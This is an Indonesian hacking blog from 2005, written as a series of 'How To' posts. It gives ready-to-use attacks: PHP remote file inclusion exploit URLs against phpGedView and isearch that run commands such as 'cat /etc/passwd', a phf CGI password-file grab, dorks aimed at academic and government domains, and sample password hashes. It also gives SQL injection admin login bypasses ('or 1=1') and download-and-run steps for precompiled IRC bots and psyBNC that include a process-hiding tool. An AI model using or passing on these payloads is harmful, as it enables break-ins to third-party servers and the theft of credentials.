Seorang teman memberi saya pepatah tua dari negeri cina
Sun-Tzu:"If the enemy leaves a door open, you must rush in."
Yang artinya :
Jika musuh membiarkan pintu terbuka, kita harus masuk menyerbu!
Pepatah itu mengingatkan saya beberapa waktu yang lalu, ketika saya pertama kali belajar membuat psyBNC/Bot, karena kinerja, cara kompilasinya yang rumit, memacu saya untuk mencari skript yang sudah ter compile.
Akhir pencarian saya menemukan Chanarybot/ChanaryPSY (dari chanel #chanary@DALnet) yang kompilasinya begitu mengagumkan (menurut saya waktu itu)
Setelah beberapa waktu yang cukup cukup cukup lama, akhirnya saya menyadari ternyata keduanya memiliki backdoor yang berjalan tanpa kita ketahui, melakukan loggin ke access psy/bot kita serta hal hal yang tidak kita bayangkan.
<fazar>Sun-Tzu:"If the enemy leaves a door open, you must rush in.
<fazar>Jika musuh membiarkan pintu terbuka, kita harus masuk menyerbu!
<fazar>;)
<anak-rimba>wah apa itu
<anak-rimba>itu back dor namanya mas
Bukan salah yang membuat backdoor jika password anda dicuri, karena anda menggunakan/mendapatkannya secara gratis tanpa memeriksanya terlebih dahulu.
Peringatan Pemerintah :
- Baca aturan pakai, jika anda tidak setuju dengan skript orang lain silakan EDIT sendiri, tentu saja tanpa menghilangkan notabane nya.
Friday, December 23, 2005
Syaloom
How To 9
PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Description:
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.
External References:
Mitre CVE: CAN-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Summary:
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). Multiple PHP Code Injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.
Release Date:
January 29 2004
Severity:
High
SecureScout Testcase ID:
TC 17868 (Still in Development)
Vulnerable Systems:
phpGedView version 2.65.1 and prior
Vulnerability Type:
PHP Injection - force the Target to Execute a PHP file from Attackers Server
Vendor Status:
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem
Example:
(HIGH Risk no authentication needed)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform a http://[target]/session.php request the GEDCOM file will be in argument of the login.php call.
The attacker has to create on his web site a directory call themes/standard, and a file theme.php
For example: theme.php =
and the request, will execute the phpinfo() command on the vulnerable target.
Credits:
Cedric Cochin - netVigilance Vulnerability Research team
Tuesday, December 13, 2005
Thanks To Anymous
say : thx to Anymous, about your comment
Saran anda mengenai PoC di tampung, saya akan berusaha memberikan format PoC yang bagus, karena blog ini bukan security focus/hacking tutorial, hanya sebuah note buat teman teman yang memerlukan
Satu hal yang perlu di ingat, bukan saya yang menemukan bugs/exploit ini, saya hanya merakit, bukan author. Ibarat bom saya tidak bisa bikin eRDeeX/C4, hanya merakit.
Namun saran anda semua akan saya tampung.
Thx.
Friday, December 09, 2005
How To 8
'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:
isearch_core.inc.php
isearch_spider.inc.php
i search_search.inc.php
A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd
The author indicates that this vulnerability was reported by blackcobra-x.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution: No solution was available at the time of this entry.
Vendor URL: www.isearchthenet.com/isearch/index.php (Links to External Site)
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: taktau@taktau.cc
Tuesday, December 06, 2005
Telnet Chat
Chat To IRC :
But No mIRC, No BitchX, No XChat
Use Telnet
set localecho
irc.telkom.net.id 6667
USER Idnet localhost localhost :Real
NICK nick
JOIN #kecoak
PART #
PRIVMSG #
PRIVMSG
QUIT :
why Telnet, because 99.9% you can get in all OS, so use this only on emergency situation....!!!
Monday, December 05, 2005
How To 4
altavista Dorks :
host:ac.il
http://[target]/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
passwd enkripsi:
root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh
passwd no enkripsi/no shadow:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh
cara kerja program cracker adalah kurang lebih seperti ini:
1. baca kata #1 dari file kamus/wordlist
2. enkripisi dengan algoritma DES
3. baca baris 1 dari file passwd (account 1), baca nama account dan passwd terenkripsi
4. bandingkan apakah kata#1terenkripsi = passwd1terenkripsi
5. ya? beritahukan user/catat di log, tidak? baca baris2 file passwd, then.
Another Link
ac.jp (akademis jepang)
ac.kr (akademis korea)
.edu (akademis amrik)
ac.uk (akademis inggris)
go.kr (pemerintah korea)
go.in (pemerintah india)
ac.ir (akademis iran)
com.il (komersil israel) dll dll.
BOT Precompile
http://h1.ripway.com/xgoogle/zregbot.tar.tar
tar
rm zregbot.tar.tar
cd
cd scripts
http://home.ripway.com/2005-2/261717/buhamtcl.txt
mv ary.tcl
./nadya PID nickbot ident ip channel owner
How To 5
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.
Target :
http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.
PsyBNC Precompile
http://channels.dal.net/bodi/irc/prepsybnc.tar.gz
tar
rm prepsybnc.tar.gz
mv psybnc
cd
rm scripts/DEFAULT.SCRIPT
ps
./kik "process" ./psybnc
/sbin/ifconfig grep inet
cat /etc/hosts
ls -FRla grep drwxrwxrwx
How To 2
1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:
Target :
http://www.example.com/[12allTarget]/admin/index.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
About Me
![[Valid Atom 1.0]](http://img98.imageshack.us/img98/5126/validatomqv8.png "Validate my Atom 1.0 feed")
... karena BLOG JUGA ADALAH KARYA CIPTA. Biasakan untuk meminta ijin kepada pemilik karya atau paling tidak menyebutkan sumber asal. Hitung-hitung bersilaturahmi dan memperluas pergaulan, bukan?
Semua unsur blog ini, termasuk gambar, foto, tulisan dan lainnya berada di bawah aturan Creative Common License, kecuali disebutkan sebaliknya.